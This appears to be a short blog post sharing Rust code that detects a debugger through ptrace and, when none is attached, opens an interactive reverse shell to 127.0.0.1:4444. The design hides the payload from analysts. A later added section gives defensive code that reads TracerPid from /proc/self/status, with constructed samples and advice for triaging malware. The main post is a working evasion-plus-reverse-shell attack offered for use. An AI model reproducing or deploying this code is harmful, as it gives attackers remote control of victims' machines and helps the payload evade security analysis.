
Anti-Debug with conditional reverse-shell

Jack Hastilow

If you are reading this, this program is basic anti-debug in Rust; it is able to detect whether or not it is being debugged.
If the program detects an active tracer then it won't execute its payload… If not, then it will send the reverse shell.

    use nix::sys::ptrace::traceme;
    use std::process::exit;

    fn main() {
        // PTRACE_TRACEME fails if another process is already tracing us,
        // so Err means a debugger is attached and Ok means we are untraced.
        let _res = match traceme() {
            Ok(_s) => invade(),
            Err(_e) => evade(),
        };
        exit(0)
    }

    fn evade() {
        println!("......Debugger...Detected......")
    }

    fn invade() {
        use std::net::TcpStream;
        use std::os::unix::io::{AsRawFd, FromRawFd};
        use std::process::{Command, Stdio};

        println!("......Offensive...Started......");
        // Connect back to the listener and hand the socket fd to a shell
        // as its stdin, stdout and stderr.
        let stream = TcpStream::connect("127.0.0.1:4444").unwrap();
        let fd = stream.as_raw_fd();
        let _ = Command::new("/bin/sh")
            .arg("-i")
            .stdin(unsafe { Stdio::from_raw_fd(fd) })
            .stdout(unsafe { Stdio::from_raw_fd(fd) })
            .stderr(unsafe { Stdio::from_raw_fd(fd) })
            .spawn()
            .unwrap()
            .wait();
    }

To understand how it works technically:
Linux debuggers use ptrace() to trace. On Linux a process may only call ptrace() once; this means if a process is already being debugged then it cannot call ptrace (it will result in an error). This makes debugger detection kind of easy, so we can just issue our own ptrace call(s), evaluate the results and decide what we can do…

I will be very happy to hear your reviews
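As an added example (not part of the post above, and not the author's code), here is the companion tracer check that defenders and analysts most often meet alongside the PTRACE_TRACEME trick: reading the TracerPid field from /proc/self/status, which the kernel sets to the PID of an attached tracer (0 when untraced). It uses only the standard library, so it builds without the nix crate; the two status texts embedded below are constructed samples, and the file path and field format are those of procfs on Linux.

```rust
use std::fs;

/// Parse the `TracerPid:` field out of the text of /proc/<pid>/status.
/// Returns None when the field is missing or not a number.
pub fn tracer_pid_from_status(status: &str) -> Option<u32> {
    status
        .lines()
        .find_map(|line| line.strip_prefix("TracerPid:"))
        .and_then(|rest| rest.trim().parse::<u32>().ok())
}

/// Returns true when the current process has an attached tracer.
/// On non-Linux systems or if procfs is unreadable it reports "not traced".
pub fn is_traced() -> bool {
    match fs::read_to_string("/proc/self/status") {
        Ok(text) => tracer_pid_from_status(&text).map_or(false, |pid| pid != 0),
        Err(_) => false,
    }
}

// Constructed sample status texts (not captured from a real system).
pub const SAMPLE_UNTRACED: &str = "Name:\tdemo\nState:\tR (running)\nTracerPid:\t0\nPid:\t4242\n";
pub const SAMPLE_TRACED: &str = "Name:\tdemo\nState:\tt (tracing stop)\nTracerPid:\t12345\nPid:\t4242\n";
pub const SAMPLE_MISSING: &str = "Name:\tdemo\nState:\tR (running)\nPid:\t4242\n";

fn main() {
    println!("constructed untraced sample -> {:?}", tracer_pid_from_status(SAMPLE_UNTRACED));
    println!("constructed traced sample   -> {:?}", tracer_pid_from_status(SAMPLE_TRACED));
    println!("this process traced? {}", is_traced());
}
```

Run it once normally and once under a debugger or strace to see the live value flip; when triaging a sample, a read of /proc/self/status or a PTRACE_TRACEME call early in main is the signature to look for before the real behaviour branches.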